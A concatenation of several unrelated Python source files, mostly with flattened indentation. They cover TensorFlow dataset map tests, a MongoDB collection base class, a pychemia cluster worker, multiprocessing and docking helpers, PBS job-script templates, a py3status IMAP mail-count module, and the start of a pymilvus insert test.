num_parallel_calls=2)
get_next = self.getNext(dataset)
for i in range(100):
self.assertEqual(i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testConstantOutput(self, apply_map):
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, lambda x: [x, "hello", 10])
self.assertDatasetProduces(dataset, [(i, b"hello", 10) for i in range(10)])
@combinations.generate(_test_combinations())
def testWarnOnLookupTable(self, apply_map):
def collecting_function(x):
_ = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(["a"], [1.]), 0.0, name="t1")
return x
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
dataset = dataset_ops.Dataset.range(10)
_ = apply_map(dataset, collecting_function)
# NOTE(mrry): Python 3 prints other warnings in addition to the one we are
# testing, so we search for the expected warning.
self.assertGreaterEqual(len(w), 1)
found_warning = False
for warning in w:
if ("Creating resources inside a function passed to Dataset.map() is "
"not supported." in str(warning)):
found_warning = True
break
self.assertTrue(found_warning)
@combinations.generate(test_base.default_test_combinations())
def testWarnOnSeedFromOuterGraph(self):
with ops.Graph().as_default() as g:
g.seed = 10
warnings.simplefilter("always")
def _check_warning(caught_warnings, expected_result):
found_warning = False
for warning in caught_warnings:
if ("Explicitly set the seed in the function if this is not the "
"intended behavior" in str(warning)):
found_warning = True
break
self.assertEqual(found_warning, expected_result)
      # The map function doesn't use a seed, so no warning is generated.
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).map(math_ops.square)
_check_warning(w, False)
def random_func(x):
x = math_ops.add(x, 1)
random_ops.random_shuffle([x, math_ops.square(x)])
return x
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).map(random_func)
_check_warning(w, True)
def random_func_seeded(x):
ops.get_default_graph().seed = None
random_ops.random_shuffle(x)
return x
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).batch(2).map(random_func_seeded)
_check_warning(w, False)
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).batch(2).map(
lambda x: random_ops.random_shuffle(x, seed=37))
_check_warning(w, False)
@combinations.generate(_test_combinations())
def testNestedDatasetMap(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
dataset = apply_map(dataset, dataset_ops.Dataset.from_tensor_slices)
dataset = apply_map(dataset, lambda ds: ds.batch(3)).flat_map(lambda x: x)
self.assertDatasetProduces(dataset, expected_output=[[1.0, 2.0, 3.0]])
@combinations.generate(_test_combinations())
def testReturnValueError(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
with self.assertRaisesRegexp(
TypeError, r"Unsupported return value from function passed to "
r"Dataset.map\(\)"):
_ = apply_map(dataset, lambda x: Foo)
@combinations.generate(test_base.default_test_combinations())
def testBrokenFunctionErrorOnInitialization(self):
dataset = dataset_ops.Dataset.from_tensor_slices([1.0, 2.0, 3.0])
def broken_function(_):
"""A function deliberately designed to fail on instantiation."""
value = []
tensor_value = attr_value_pb2.AttrValue()
tensor_value.tensor.CopyFrom(
tensor_util.make_tensor_proto(
value, dtype=dtypes.float32, shape=[0], verify_shape=False))
dtype_value = attr_value_pb2.AttrValue(type=dtypes.int32.as_datatype_enum)
# Create a "Const" op with a `tf.float32` value and a `tf.int32` type.
const_tensor = ops.get_default_graph().create_op(
"Const", [], [dtypes.int32],
attrs={
"value": tensor_value,
"dtype": dtype_value
},
name="BrokenConst").outputs[0]
return const_tensor
dataset = dataset.map(broken_function)
self.assertDatasetProduces(
dataset, expected_error=(errors.InvalidArgumentError, "BrokenConst"))
@combinations.generate(
combinations.times(
_test_combinations_with_mode("graph"),
combinations.combine(num_parallel_calls=[None, 12])))
def testNoInterOpParallelism(self, apply_map, num_parallel_calls):
dataset = dataset_ops.Dataset.from_tensors(0)
def _get_tid():
return np.int64(threading.current_thread().ident)
def _map_fn(_):
tids = []
for _ in range(10):
tids.append(script_ops.py_func(_get_tid, [], dtypes.int64))
return tids
dataset = apply_map(dataset, _map_fn)
dataset._variant_tensor.op._set_attr("use_inter_op_parallelism",
attr_value_pb2.AttrValue(b=False))
get_next = self.getNext(dataset)
tids = self.evaluate(get_next())
self.assertTrue(all(tids[0] == tid for tid in tids))
@combinations.generate(
combinations.times(_test_combinations(), _short_circuit_test_cases(),
combinations.combine(num_parallel_calls=[None, 12])))
def testShortCircuit(self, apply_map, structure, fn, num_parallel_calls):
dataset = self.structuredDataset(structure).repeat()
dataset = apply_map(dataset, fn, num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset)
if isinstance(structure, tuple):
expected = fn(*self.evaluate(self.structuredElement(structure)))
else:
expected = fn(self.evaluate(self.structuredElement(structure)))
self.assertEqual(expected, self.evaluate(get_next()))
@combinations.generate(
combinations.times(_test_combinations(),
combinations.combine(num_parallel_calls=[None, 12])))
def testShortCircuitCapturedInput(self, apply_map, num_parallel_calls):
captured_t = variables.Variable(42)
dataset = self.structuredDataset(None).repeat()
dataset = apply_map(
dataset, lambda x: captured_t, num_parallel_calls=num_parallel_calls)
self.evaluate(variables.global_variables_initializer())
get_next = self.getNext(dataset, requires_initialization=True)
self.assertEqual(42, self.evaluate(get_next()))
@combinations.generate(
combinations.times(
_test_combinations(),
combinations.combine(num_elements=1, num_parallel_calls=1) +
combinations.combine(num_elements=10, num_parallel_calls=1) +
combinations.combine(num_elements=10, num_parallel_calls=10) +
combinations.combine(num_elements=100, num_parallel_calls=1) +
combinations.combine(num_elements=100, num_parallel_calls=10) +
combinations.combine(num_elements=100, num_parallel_calls=100)))
def testSloppyInterleaveInOrder(self, apply_map, num_elements,
num_parallel_calls):
dataset, coordination_events = _make_coordinated_sloppy_dataset(
apply_map, num_elements, num_parallel_calls)
options = dataset_ops.Options()
options.experimental_threading = threading_options.ThreadingOptions()
options.experimental_threading.private_threadpool_size = (
num_parallel_calls + 1)
dataset = dataset.with_options(options)
get_next = self.getNext(dataset, requires_initialization=True)
for i in range(num_elements):
coordination_events[i].set()
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(
combinations.times(
_test_combinations(),
combinations.combine(num_elements=10, num_parallel_calls=10) +
combinations.combine(num_elements=100, num_parallel_calls=10) +
combinations.combine(num_elements=100, num_parallel_calls=100)))
def testSloppyInterleaveOutOfOrder(self, apply_map, num_elements,
num_parallel_calls):
dataset, coordination_events = _make_coordinated_sloppy_dataset(
apply_map, num_elements, num_parallel_calls)
options = dataset_ops.Options()
options.experimental_threading = threading_options.ThreadingOptions()
options.experimental_threading.private_threadpool_size = (
num_parallel_calls + 1)
dataset = dataset.with_options(options)
get_next = self.getNext(dataset, requires_initialization=True)
elements = [x for x in range(num_elements)]
for i in [1, 4, 7]:
elements[i], elements[i + 1] = elements[i + 1], elements[i]
for element in elements:
coordination_events[element].set()
self.assertEqual(element * element, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(
combinations.combine(
tf_api_version=2,
mode=["eager", "graph"],
num_parallel_calls=[None, 12]))
def testPreserveCardinality(self, num_parallel_calls):
def py_fn(_):
raise StopIteration()
dataset = dataset_ops.Dataset.from_tensors(0).map(
lambda x: script_ops.py_func(py_fn, [x], dtypes.int64),
num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset)
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
@combinations.generate(_test_combinations_with_mode("graph"))
def testCollectionCopy(self, apply_map):
w = variable_scope.get_variable("w", [])
self.assertIn(w, ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
def func(x):
self.assertIn(w, ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
return x
dataset = dataset_ops.Dataset.from_tensors(constant_op.constant(1.0))
_ = apply_map(dataset, func)
@combinations.generate(
combinations.times(
_test_combinations_with_mode_v1("graph"),
combinations.combine(num_parallel_calls=[None, 12])))
def testMapCancellation(self, apply_map, num_parallel_calls):
    # Checks that cancellation is threaded through to the map transformation.
queue = data_flow_ops.FIFOQueue(10, dtypes.int32, ())
def fn(_):
return queue.dequeue()
dataset = dataset_ops.Dataset.range(1)
dataset = apply_map(dataset, fn, num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset, requires_initialization=True)
with self.cached_session() as sess:
thread = self.checkedThread(self.assert_op_cancelled, args=(get_next(),))
thread.start()
time.sleep(0.2)
sess.close()
thread.join()
  # TODO(b/126553094): map doesn't work with a variable defined inside a
  # function in eager mode; Graph tensors may leak out of the function-building
  # context, since variables are created in init_scope.
@combinations.generate(test_base.graph_only_combinations())
def testCreateVariableInsideFunctionWithGetter(self):
def func(_):
with variable_scope.variable_scope(
"variable", reuse=variable_scope.AUTO_REUSE):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
return counter_var.assign_add(1)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
if hasattr(dataset, "map_with_legacy_function"):
# NOTE: In the legacy function, resource is captured by value.
with self.assertRaisesWithPredicateMatch(
AttributeError, "'Tensor' object has no attribute 'assign_add'"):
dataset.map_with_legacy_function(func)
dataset = dataset.map(func)
self.evaluate(variables.global_variables_initializer())
get_next = self.getNext(dataset, requires_initialization=True)
for i in range(10):
self.assertEqual(i + 1, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaptureVariable(self, apply_map):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, lambda _: counter_var.assign_add(1))
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(counter_var.initializer)
for i in range(10):
self.assertEqual(i, self.evaluate(counter_var))
self.assertEqual(i + 1, self.evaluate(get_next()))
self.assertEqual(10, self.evaluate(counter_var))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(10, self.evaluate(counter_var))
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureUninitializedVariableError(self, apply_map):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, lambda _: counter_var.assign_add(1))
get_next = self.getNext(dataset, requires_initialization=True)
with self.assertRaises(errors.NotFoundError):
self.evaluate(get_next())
# TODO(b/121264236): add eager mode coverage when we have multi-device setup.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureConstantsWithConflictingDevices(self, apply_map):
config = config_pb2.ConfigProto(device_count={"CPU": 3})
with self.cached_session(config=config):
with ops.device("/device:CPU:0"):
a = constant_op.constant(3.0)
with ops.device("/device:CPU:1"):
b = constant_op.constant(5.0)
def func(_):
return math_ops.add(a, b)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, func)
expected_output = [8.0] * 10
self.assertDatasetProduces(dataset, expected_output=expected_output)
# TODO(b/121264236): add eager mode coverage when we have multi-device setup.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testReferenceVariablesWithMultipleDevices(self, apply_map):
config = config_pb2.ConfigProto(device_count={"CPU": 3})
with self.cached_session(config=config):
def func(_):
with ops.device("/device:CPU:0"):
a = variables.VariableV1(3.0)
with ops.device("/device:CPU:1"):
b = variables.VariableV1(5.0)
return math_ops.add(a, b)
# NOTE: Use the legacy function implementation as eager function will
# convert RefVariables to ResourceVariables.
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, func)
self.evaluate(variables.global_variables_initializer())
expected_output = [8.0] * 10
self.assertDatasetProduces(
dataset,
expected_output=expected_output,
requires_initialization=True)
# TODO(b/121264236): add eager mode coverage when we have multi-device setup.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testResourceVariablesWithMultipleDevices(self, apply_map):
config = config_pb2.ConfigProto(device_count={"CPU": 3})
def func(_):
with variable_scope.variable_scope(
"variable", reuse=variable_scope.AUTO_REUSE):
with ops.device("/device:CPU:0"):
a_var = variable_scope.get_variable(
"a", (), dtypes.int32, use_resource=True)
a_var = math_ops.add(a_var, 1)
with ops.device("/device:CPU:1"):
b_var = variable_scope.get_variable(
"b", (), dtypes.int32, use_resource=True)
return math_ops.add(a_var, b_var)
g = ops.Graph()
with self.session(config=config, graph=g):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, func)
self.evaluate(variables.global_variables_initializer())
expected_output = [1] * 10
self.assertDatasetProduces(
dataset,
expected_output=expected_output,
requires_initialization=True)
@combinations.generate(
combinations.times(
_test_combinations(),
combinations.combine(
local_determinism=[None, True, False],
global_determinism=[True, False])))
def testDeterminismConfiguration(self, apply_map, local_determinism,
global_determinism):
expect_determinism = local_determinism or (local_determinism is None and
global_determinism)
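    # Per-map `deterministic` takes precedence; the global
    # `experimental_deterministic` option only applies when `deterministic`
    # is left as None.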
elements = list(range(1000))
def dataset_fn(delay_ms):
def sleep(x):
time.sleep(delay_ms / 1000)
return x
def map_function(x):
if math_ops.equal(x, 0):
return script_ops.py_func(sleep, [x], x.dtype)
else:
return x
dataset = dataset_ops.Dataset.from_tensor_slices(elements)
dataset = apply_map(
dataset,
map_function,
num_parallel_calls=2,
deterministic=local_determinism)
opts = dataset_ops.Options()
opts.experimental_deterministic = global_determinism
dataset = dataset.with_options(opts)
return dataset
self.checkDeterminism(
dataset_fn, expect_determinism, expected_elements=elements)
@combinations.generate(_test_combinations())
def testNoneComponent(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors((42, None))
def map_function(x, y):
if y is None:
return x / 2
return x
dataset = apply_map(dataset, map_function)
self.assertDatasetProduces(dataset, expected_output=[21])
if __name__ == "__main__":
test.main()
|
_base.py
|
"""Base class for all factorial classes."""
import os
from abc import ABC
from threading import Thread
from typing import final
from django.conf import settings
from pymongo.collection import Collection
from JellyBot.systemconfig import Database
from extutils.mongo import get_codec_options
from mixin import ClearableMixin
from models.utils import ModelFieldChecker
from mongodb.utils import backup_collection
from mongodb.factory import MONGO_CLIENT
from ._dbctrl import SINGLE_DB_NAME
from .mixin import ControlExtensionMixin
__all__ = ("BaseCollection",)
class BaseCollection(ControlExtensionMixin, ClearableMixin, Collection, ABC):
"""Base class for a collection instance."""
def __init__(self):
self._db = MONGO_CLIENT.get_database(self.get_db_name())
super().__init__(self._db, self.get_col_name(), codec_options=get_codec_options())
self.get_model_cls() # Dummy call to check if `model_class` has been defined
self.build_indexes()
self.on_init()
Thread(target=self.on_init_async).start()
@final
def on_init(self):
"""Method to be executed after all initializations completed."""
if not os.environ.get("NO_FIELD_CHECK") and not os.environ.get("TEST"):
ModelFieldChecker.check_async(self)
if settings.PRODUCTION:
backup_collection(
MONGO_CLIENT, self.get_db_name(), self.get_col_name(),
SINGLE_DB_NAME is not None, Database.BackupIntervalSeconds)
def on_init_async(self):
"""Hook method to be called asychronously on the initialization of this class."""
def build_indexes(self):
"""Method to be called when building the indexes of this collection."""
def clear(self):
self.delete_many({})
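# A minimal subclass sketch (illustrative only: the hook names are inferred
# from the calls in __init__ above, and the database/collection names plus
# `DemoModel` are assumptions, not part of this codebase):
#
# class DemoCollection(BaseCollection):
#     @classmethod
#     def get_db_name(cls):
#         return "demo"
#
#     @classmethod
#     def get_col_name(cls):
#         return "items"
#
#     @classmethod
#     def get_model_cls(cls):
#         return DemoModel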
|
cluster.py
|
import time
from multiprocessing import Pool, Process
import pychemia
__author__ = 'Guillermo Avendano-Franco'
def cluster_worker(db_settings):
    # Repeatedly claim one unlocked, not-yet-evaluated entry, evaluate it, and
    # store the result; exit when no such entry remains.
    while True:
pcdb = pychemia.db.get_database(db_settings)
population = pychemia.population.LJCluster(pcdb)
entry = population.pcdb.db.pychemia_entries.find_one({'status.' + population.tag: True,
'status.lock': {'$exists': False},
'properties': {}}, {'_id': 1})
if entry is not None:
population.pcdb.lock(entry['_id'])
structure, properties, energy = population.evaluate(entry['_id'])
population.pcdb.update(entry['_id'], structure=structure, properties=properties)
population.pcdb.unlock(entry['_id'])
else:
break
def cluster_evaluator(db_settings, nparal):
pcdb = pychemia.db.get_database(db_settings)
population = pychemia.population.LJCluster(pcdb)
population.recover()
    print('Starting evaluator for %s' % population.name)
while True:
entry = population.pcdb.db.pychemia_entries.find_one({'status.' + population.tag: True,
'status.lock': {'$exists': False},
'properties': {}}, {'_id': 1})
if entry is None:
time.sleep(2)
create_pool = False
else:
create_pool = True
if create_pool:
pool = Pool(processes=nparal)
pool.map(cluster_worker, nparal * [db_settings])
pool.close()
pool.join()
def cluster_launcher(db_settings, nparal):
p = Process(target=cluster_evaluator, args=(db_settings, nparal))
p.start()
return p
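# Usage sketch (hedged: the `db_settings` keys follow the conventions of
# pychemia.db.get_database and the values here are placeholders):
#
# if __name__ == '__main__':
#     db_settings = {'name': 'lj_clusters', 'host': 'localhost', 'port': 27017}
#     proc = cluster_launcher(db_settings, nparal=4)
#     proc.join()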
|
utils.py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 21 23:43:31 2021
@author: o_o
"""
import multiprocessing
def count_processors(num_inputs, num_processors):
"""
Checks processors available and returns a safe number of them to
utilize.
:param int num_inputs: The number of inputs.
:param int num_processors: The number of desired processors.
:returns: The number of processors to use.
"""
    # First, if num_processors <= 0, determine the number of processors to
    # use programmatically.
    if num_processors <= 0:
num_processors = multiprocessing.cpu_count()
# reduce the number of processors if too many have been specified
if num_inputs < num_processors:
num_processors = num_inputs
return num_processors
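# Doctest-style illustration of the clamping behaviour (the second example
# assumes a machine with at least 3 cores):
#
# >>> count_processors(num_inputs=3, num_processors=8)   # clamped to the inputs
# 3
# >>> count_processors(num_inputs=3, num_processors=0)   # auto-detect, then clamp
# 3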
def worker(task_queue, done_queue):
    # Pull (seq, (func, args)) jobs until the 'STOP' sentinel arrives, tagging
    # each result with its sequence number so the caller can restore order.
    for seq, job in iter(task_queue.get, 'STOP'):
        func, args = job
        result = func(*args)
        done_queue.put((seq, result))
def start_processes(inputs, num_processors):
"""
Creates a queue of inputs and outputs
"""
# Create queues
task_queue = multiprocessing.Queue()
done_queue = multiprocessing.Queue()
# Submit tasks
for item in inputs:
task_queue.put(item)
# Start worker processes
for i in range(num_processors):
multiprocessing.Process(target = worker, args = (task_queue, done_queue)).start()
# Get and print results
results = []
for i in range(len(inputs)):
results.append(done_queue.get())
# Tell child processes to stop
for i in range(num_processors):
task_queue.put('STOP')
results.sort(key = lambda tup: tup[0])
    return [result for _, result in results]
def multi_threading(inputs, num_processors, task_name):
"""Initialize this object.
Args:
inputs ([data]): A list of data. Each datum contains the details to
run a single job on a single processor.
num_processors (int): The number of processors to use.
task_class_name (class): The class that governs what to do for each
job on each processor.
"""
results = []
# If there are no inputs, just return an empty list.
if len(inputs) == 0:
return results
num_processors = count_processors(len(inputs), num_processors)
tasks = []
for index, item in enumerate(inputs):
if not isinstance(item, tuple):
item = (item,)
task = (index, (task_name, item))
tasks.append(task)
if num_processors == 1:
for item in tasks:
job, args = item[1]
output = job(*args)
results.append(output)
else:
results = start_processes(tasks, num_processors)
return results
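# Expected calling pattern (illustrative; `square` is a stand-in task that
# must live at module level so multiprocessing can pickle it):
#
# def square(x):
#     return x * x
#
# if __name__ == '__main__':
#     print(multi_threading([1, 2, 3, 4], num_processors=2, task_name=square))
#     # -> [1, 4, 9, 16], returned in input order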
#%%
from pathlib import Path
import os
import random
from multiprocessing import Pool
def new_out():
_id = random.randint(0,100)
return f'./out-vina-multiprocessing_{_id:0>3d}.pdbqt'
def run_dock_multithread(docking_object, out):
"""
Run the docking of a single molecule.
Inputs:
:param object docking_object: the class for running the chosen docking
method
:param str pdb: the path to the pdb of a molecule
Returns:
:returns: list failed_smiles_names: any smiles which were deleted (ie.
docking failed)
"""
print("Attempt to Dock complete: ", out)
failed_smiles_names = docking_object.run_dock(out)
return failed_smiles_names
class docking:
    # Declared as a staticmethod so the commented usage below, which passes the
    # class itself rather than an instance, keeps working.
    @staticmethod
    def run_dock(out):
ligand = Path('../../data/prepare/prepared_ligands_vina/lig_3b2x.pdbqt')
receptor = Path('../../data/prepare/prepared_receptors_vina/receptor_3b2x.pdbqt')
conf = Path('../../data/config_vina_ex1.txt')
torun = (f"vina --config {conf}\
--receptor {receptor}\
--ligand {ligand}\
--out {out}\
--cpu 1")
return os.system(torun)
# if __name__ == '__main__':
# outs = tuple([tuple([docking,new_out()]) for i in range(5)])
# run_dock_multithread(*outs[0])
# multi_threading(outs,4,run_dock_multithread)
# with Pool(5) as p:
# print(p.map(new_process, outs))
|
scripts.py
|
qscript = """
### Script for setting qsub configuration and calling Python script
### Set number of nodes: Set number of cores
#PBS -l nodes={}:ppn={}
### Set walltime
#PBS -l walltime={}
### Set amount of memory
#PBS -l mem={}
### Set CPU time ([[h:]m:]s).
#PBS -l cput={}
{}
"""
#------------------------------------------------------------------------------
pyscript = """
import subprocess
PYTHON_VERSION = {}
script = '''
import pickle
import shutil
import sys
import os
temp_dir = '{}'
try:
with open(os.path.join(temp_dir,'fnc.pkl'),'rb') as f:
fnc = pickle.loads(f.read())
with open(os.path.join(temp_dir,'args.pkl'),'rb') as f:
args = pickle.loads(f.read())
output = fnc(args)
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
    fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
    output = str(e)+str(exc_type)+str(fname)+str(exc_tb.tb_lineno)
with open(os.path.join(temp_dir,'result.pkl'),'wb') as f:
f.write(pickle.dumps(output))
'''
if PYTHON_VERSION == 2:
subprocess.call(["python2","-c",script])
else:
subprocess.call(["python3","-c",script])
"""
#------------------------------------------------------------------------------
session_pyscript = """
#-*- encoding: utf-8 -*-
import subprocess
import threading
import time
import dill
import sys
import os
PYTHON_VERSION = {}
script = '''
import importlib
import threading
import pickle
import string
import dill
import time
import sys
import os
job_dir = \"{}\"
def run_job(func_file,args_file,num):
with open(func_file,"rb") as f:
fnc = pickle.load(f)
with open(args_file,"rb") as f:
print(args_file)
myargs = pickle.load(f)
if not isinstance(myargs,list):
myargs = [myargs]
try:
output = fnc(*myargs)
except Exception as e:
output = e
with open(os.path.join(job_dir,"res"+str(num)+".pkl"),"wb") as f:
pickle.dump(output,f)
jobs = [n for n in os.listdir(job_dir) if 'fnc' in n]
print(jobs)
job_nums = []
for job in jobs:
    print(job)
    func_file = os.path.join(job_dir,job)
    num = int(job.split('.')[0][-1])
    args_file = os.path.join(job_dir,'args'+str(num)+'.pkl')
    job_nums.append(num)
    thread = threading.Thread(target=run_job,args=(func_file,args_file,num))
    thread.daemon = False
    thread.start()
# wait until every job has written its result file before letting the
# session exit
while True:
    finished = True
    for i in job_nums:
        if not os.path.exists(os.path.join(job_dir,"res"+str(i)+".pkl")):
            finished = False
    time.sleep(1e-1)
    if finished:
        break
'''
if PYTHON_VERSION == 2:
subprocess.call(["python2","-c",script])
else:
subprocess.call(["python3","-c",script])
"""
|
imap.py
|
# -*- coding: utf-8 -*-
"""
Display number of unread messages from IMAP account.
Configuration parameters:
allow_urgent: display urgency on unread messages (default False)
cache_timeout: refresh interval for this module (default 60)
criterion: status of emails to check for (default 'UNSEEN')
debug: log warnings (default False)
format: display format for this module (default 'Mail: {unseen}')
hide_if_zero: hide this module when no new mail (default False)
mailbox: name of the mailbox to check (default 'INBOX')
password: login password (default None)
port: number to use (default '993')
read_timeout: timeout for read(2) syscalls (default 5)
security: login authentication method: 'ssl' or 'starttls'
        (starttls needs python 3.2 or later) (default 'ssl')
server: server to connect (default None)
use_idle: use IMAP4 IDLE instead of polling; requires compatible
server; uses cache_timeout for IDLE's timeout; will auto detect
when set to None (default None)
user: login user (default None)
Format placeholders:
{unseen} number of unread emails
Color options:
color_new_mail: use color when new mail arrives, default to color_good
@author obb, girst
SAMPLE OUTPUT
{'full_text': 'Mail: 36', 'color': '#00FF00'}
"""
import imaplib
from threading import Thread
from time import sleep
from ssl import create_default_context
from socket import error as socket_error
STRING_UNAVAILABLE = 'N/A'
class Py3status:
"""
"""
# available configuration parameters
allow_urgent = False
cache_timeout = 60
criterion = 'UNSEEN'
debug = False
format = 'Mail: {unseen}'
hide_if_zero = False
mailbox = 'INBOX'
password = None
port = '993'
read_timeout = 5
security = 'ssl'
server = None
use_idle = None
user = None
class Meta:
deprecated = {
'rename': [
{
'param': 'new_mail_color',
'new': 'color_new_mail',
'msg': 'obsolete parameter use `color_new_mail`',
},
{
'param': 'imap_server',
'new': 'server',
'msg': 'obsolete parameter use `server`',
},
],
}
def post_config_hook(self):
# class variables:
self.mail_count = None
self.connection = None
self.mail_error = None # cannot throw self.py3.error from thread
        self.command_tag = 0  # IMAP commands are tagged, so responses can be matched up to requests
self.idle_thread = Thread()
if self.security not in ["ssl", "starttls"]:
raise ValueError("Unknown security protocol")
def check_mail(self):
# I -- acquire mail_count
if self.use_idle is not False:
if not self.idle_thread.is_alive():
sleep(self.read_timeout) # rate-limit thread-restarting (when network is offline)
self.idle_thread = Thread(target=self._get_mail_count)
self.idle_thread.daemon = True
self.idle_thread.start()
else:
self._get_mail_count()
response = {'cached_until': self.py3.time_in(self.cache_timeout)}
if self.mail_error is not None:
self.py3.log(self.mail_error, level=self.py3.LOG_ERROR)
self.py3.error(self.mail_error)
self.mail_error = None
# II -- format response
if self.mail_count is None:
            response['color'] = self.py3.COLOR_BAD
response['full_text'] = self.py3.safe_format(
self.format, {'unseen': STRING_UNAVAILABLE})
elif self.mail_count > 0:
response['color'] = self.py3.COLOR_NEW_MAIL or self.py3.COLOR_GOOD
if self.allow_urgent:
response['urgent'] = True
if self.mail_count == 0 and self.hide_if_zero:
response['full_text'] = ''
else:
response['full_text'] = self.py3.safe_format(self.format, {'unseen': self.mail_count})
return response
def _check_if_idle(self, connection):
supports_idle = 'IDLE' in connection.capabilities
self.use_idle = supports_idle
self.py3.log("Will use {}".format('idling' if self.use_idle else 'polling'))
if self.use_idle and not supports_idle:
self.py3.error("Server does not support IDLE")
def _connection_ssl(self):
connection = imaplib.IMAP4_SSL(self.server, int(self.port))
return connection
def _connection_starttls(self):
connection = imaplib.IMAP4(self.server, int(self.port))
connection.starttls(create_default_context())
return connection
def _connect(self):
if self.security == "ssl":
self.connection = self._connection_ssl()
elif self.security == "starttls":
self.connection = self._connection_starttls()
if self.use_idle is None:
self._check_if_idle(self.connection)
# trigger a socket.timeout if any IMAP request isn't completed in time:
self.connection.socket().settimeout(self.read_timeout)
def _disconnect(self):
try:
if self.connection is not None:
                if self.connection.state == 'SELECTED':
self.connection.close()
self.connection.logout()
except:
pass
finally:
self.connection = None
def _idle(self):
"""
        since imaplib doesn't support IMAP4rev1 IDLE, we'll do it by hand
"""
socket = None
try:
# build a new command tag (Xnnn) as bytes:
self.command_tag = (self.command_tag + 1) % 1000
command_tag = b'X' + bytes(str(self.command_tag).zfill(3), 'ascii')
# make sure we have selected anything before idling:
directories = self.mailbox.split(',')
self.connection.select(directories[0])
socket = self.connection.socket()
# send IDLE command and check response:
socket.write(command_tag + b' IDLE\r\n')
try:
response = socket.read(4096).decode('ascii')
except socket_error:
raise imaplib.IMAP4.abort("Server didn't respond to 'IDLE' in time")
if not response.lower().startswith('+ idling'):
raise imaplib.IMAP4.abort("While initializing IDLE: " + str(response))
# wait for changes (EXISTS, EXPUNGE, etc.):
socket.settimeout(self.cache_timeout)
while True:
try:
response = socket.read(4096).decode('ascii')
if response.upper().startswith('* OK'):
continue # ignore '* OK Still here'
else:
break
except socket_error: # IDLE timed out
break
finally: # terminate IDLE command gracefully
if socket is None:
return
socket.settimeout(self.read_timeout)
socket.write(b'DONE\r\n') # important! Can't query IMAP again otherwise
try:
response = socket.read(4096).decode('ascii')
except socket_error:
raise imaplib.IMAP4.abort("Server didn't respond to 'DONE' in time")
# sometimes, more messages come in between reading and DONEing; so read them again:
if response.startswith('* '):
try:
response = socket.read(4096).decode('ascii')
except socket_error:
raise imaplib.IMAP4.abort("Server sent more continuations, but no 'DONE' ack")
expected_response = (command_tag + b' OK').decode('ascii')
if not response.lower().startswith(expected_response.lower()):
raise imaplib.IMAP4.abort("While terminating IDLE: " + response)
def _get_mail_count(self):
try:
while True:
if self.connection is None:
self._connect()
                if self.connection.state == 'NONAUTH':
self.connection.login(self.user, self.password)
tmp_mail_count = 0
directories = self.mailbox.split(',')
for directory in directories:
self.connection.select(directory)
unseen_response = self.connection.search(None, self.criterion)
mails = unseen_response[1][0].split()
tmp_mail_count += len(mails)
self.mail_count = tmp_mail_count
if self.use_idle:
self.py3.update()
self._idle()
else:
return
except (socket_error, imaplib.IMAP4.abort, imaplib.IMAP4.readonly) as e:
if self.debug:
self.py3.log("Recoverable error - " + str(e), level=self.py3.LOG_WARNING)
self._disconnect()
except (imaplib.IMAP4.error, Exception) as e:
self.mail_error = "Fatal error - " + str(e)
self._disconnect()
self.mail_count = None
finally:
self.py3.update() # to propagate mail_error
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
|
test_insert.py
|
import copy
import threading
import pytest
from pymilvus import DataType, ParamError, BaseException
from utils import utils as ut
from common.constants import default_entity, default_entities, default_binary_entity, default_binary_entities, \
default_fields
from common.common_type import CaseLabel
from utils.util_log import test_log as log
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = ut.default_float_vec_field_name
binary_field_name = ut.default_binary_vec_field_name
default_nb = ut.default_nb
row_count = ut.row_count
default_tag = ut.default_tag
default_single_query = {
"data": ut.gen_vectors(1, ut.default_dim),
"anns_field": ut.default_float_vec_field_name,
"param": {"metric_type": "L2", "params": {"nprobe": 10}},
